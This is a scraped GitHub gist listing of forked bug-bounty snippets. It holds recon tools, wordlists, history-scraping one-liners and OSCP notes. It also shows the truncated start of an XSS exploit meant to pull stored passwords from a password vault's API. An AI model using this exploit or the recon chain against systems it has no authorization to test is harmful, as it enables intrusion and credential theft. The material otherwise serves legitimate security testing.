Skip to content

Instantly share code, notes, and snippets.

@shahid1996
shahid1996 / .bash_profile
Created October 29, 2020 15:48 — forked from dwisiswant0/.bash_profile
SQLi & XSS Vulnerability Scanner
###
# ▶ go get -u github.com/lc/gau
# ▶ go get -u github.com/tomnomnom/qsreplace
# ▶ go get -u github.com/tomnomnom/hacks/kxss
# ▶ go get -u github.com/hahwul/dalfox
# ▶ git clone https://github.com/dwisiswant0/DSSS
###
gauq() {
@shahid1996
shahid1996 / password_vault_exploit.js
Created October 26, 2020 16:57 — forked from shawarkhanethicalhacker/password_vault_exploit.js
XSS Exploit code for retrieving passwords stored in a Password Vault
//Exploit Code by Shawar Khan
var data_chunks = '';
// Capturing Records from API
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) {
// Holds the records in as String
var allrecords = data;
// converting response to JSON
# extract top subdomains from your firefox history
# by @nil0x42
grep -Pao "https://[a-zA-Z0-9.-]+" ~/.mozilla/firefox/*/places.sqlite \
| sort -u | sed 's#.*://\([a-zA-Z0-9-]*\)\..*#\1#' | uniq -c | sort -rn
@shahid1996
shahid1996 / gist:b14aaba233eda7661cbb9c44cb218f99
Created October 21, 2020 17:20 — forked from tillson/gist:620e8ef87bc057f25b0a27c423433fda
Decode Base64 strings in a git repo's commit history
from pydriller import RepositoryMining
import re
import base64
foundSet = set()
for commit in RepositoryMining('./').traverse_commits():
for mod in commit.modifications:
if mod.source_code_before != None:
regex = re.findall(r"<text encoding=\"base64\">[^>]+</text>", mod.source_code_before)
for result in regex:
# https://twitter.com/brsn76945860/status/1171233054951501824
pip install mmh3
-----------------------------
# python 2
import mmh3
import requests
response = requests.get('https://cybersecurity.wtf/favicon.ico')
favicon = response.content.encode('base64')
data=['http://google.com?param1=value1',
'https://hello.com?param2=1&param3=3',
'https://hello.com?param1=1&param2=2&param4=4']
final_params=[]
all_prms=[]
for line in data:
all_prms.append(line.split('?')[1:][0].split('&'))
for line in all_prms:
@shahid1996
shahid1996 / extensions_temp_backup.txt
Created April 14, 2020 04:46 — forked from hackerscrolls/extensions_temp_backup.txt
Common temp and backup extensions for files and directories by twitter.com/hackerscrolls
.0
.1
.2
.3
.tar
.tgz
.zip
.tar.gz
.rar
.cache
@shahid1996
shahid1996 / firefox.sh
Created March 21, 2020 14:22 — forked from payloadartist/firefox.sh
Enumerate sub-domains, then open them in Firefox automatically. Useful for taking a quick glance at target's assets, and make notes, while doing recon.
# ------Instructions---------
# cat firefox.sh >> ~/.bashrc
# source ~/.bashrc
# Usage - subf_ff target.tld
# asset_ff target.tld
subf_ff () {
subfinder -d $1 -silent - t 100 | httprobe -c 50 | sort -u | while read line; do firefox $line; sleep 10; done
}
@shahid1996
shahid1996 / params.txt
Created March 5, 2020 12:11 — forked from nullenc0de/params.txt
List of parameters for content discovery
0
1
11
12
13
14
15
16
17
2

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.